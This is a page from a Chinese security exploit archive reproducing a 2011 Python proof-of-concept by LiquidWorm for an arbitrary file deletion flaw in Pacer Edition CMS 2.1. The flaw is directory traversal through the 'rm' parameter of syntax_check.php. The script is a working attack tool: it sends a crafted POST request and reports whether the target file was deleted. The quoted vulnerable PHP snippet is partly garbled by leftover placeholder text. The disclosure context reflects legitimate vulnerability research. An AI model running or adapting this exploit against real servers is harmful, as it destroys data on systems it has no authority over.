首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Pacer Edition CMS 2.1 Arbitrary File Deletion
来源:liquidworm gmail com 作者:LiquidWorm 发布时间:2011-06-10  
#!/usr/bin/python
#
#
# Pacer Edition CMS 2.1 (rm) Remote Arbitrary File Deletion Exploit
#
#
# Vendor: The Pacer Edition
# Product web page: http://www.thepaceredition.com
# Affected version: RC 2.1 (SVN: 867)
#
# Summary: The 'Pacer Edition' is a Content Management System(CMS)
# written using PHP 5.2.9 as a minimum requirement. The Pacer Edition
# CMS was based from Website baker core and has been completely
# redesigned with a whole new look and feel along with many new
# advanced features to allow you to build sites exactly how you want
# and make them, 100% yours!
#
# Desc: Input passed to the 'rm' parameter in modules/code/syntax_check.php
# is not properly sanitised before being used to delete files. This can
# be exploited to delete files with the permissions of the web server via
# directory traversal sequences passed within the 'rm' parameter.
#
#
# /modules/code/syntax_check.php (line: 99-102):
# ----------------------------------------------------------
#
# if (isset(
___FCKpd___0
REQUEST['rm'])) { # @unlink(
___FCKpd___0
REQUEST['rm']); # die(); # } # # ---------------------------------------------------------- # # # Tested on: Microsoft Windows XP Professional SP3 (EN) # Apache 2.2.14 (Win32) # PHP 5.3.1 # MySQL 5.1.41 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # liquidworm gmail com # Zero Science Lab # # # Advisory ID: ZSL-2011-5017 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5017.php # # # # 07.06.2011 # import socket import sys print '\n-------------------------------------------------------------------' print '\n Pacer Edition CMS 2.1 (rm) Remote Arbitrary File Deletion Exploit' print '\n-------------------------------------------------------------------\n' if len(sys.argv) < 4: print '\nUsage: ' + sys.argv[0] + ' <target> <port> <file>\n' print 'Example: ' + sys.argv[0] + ' 192.168.16.101 80 naked.jpg\n' sys.exit(0) host = sys.argv[1] port = int(sys.argv[2]) file = sys.argv[3] s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((host, port)) s.settimeout(10) answ = s.recv(1024) s.send('POST /modules/code/syntax_check.php?rm=..%2f..%2f..%2f..%2f..%2f..%2f' + file + '%00 HTTP/1.1\r\n' 'Host: ' + host + '\r\n' 'Connection: keep-alive\r\n' 'Content-Length: 0\r\n' 'Cache-Control: max-age=0\r\n' 'Origin: null\r\n' 'User-Agent: thricer\r\n' 'Content-Type: multipart/form-data; boundary=----x\r\n' 'Accept: text/html\r\n' 'Accept-Language: en-US,en;q=0.8\r\n' 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n' '\r\n\r\n') htcode = 'HTTP/1.1 200' if htcode not in answ[:len(htcode)]: print '- Error deleting file!\n' sys.exit(0) else: print '+ File ' + file + 'deleted!\n' s.close

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FreeBSD/x86 Execve ('/bin/sh')
·IBM Tivoli Endpoint Manager PO
·7-Technologies IGSS 9 IGSSdata
·UUSEE Active-X Buffer Overflow
·phpcms v2.4 SQL injection expl
·KMPlayer 3.0.0.1440 Buffer Ove
·FreeBSD/x86 SmallBind TCP on p
·DEC Alpha Linux 3.0 Local Root
·ActFax Server FTP Remote BOF (
·Linux/x86-32 - ConnectBack wit
·VLC Media Player XSPF Local Fi
·Cisco AnyConnect VPN Client Ac
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved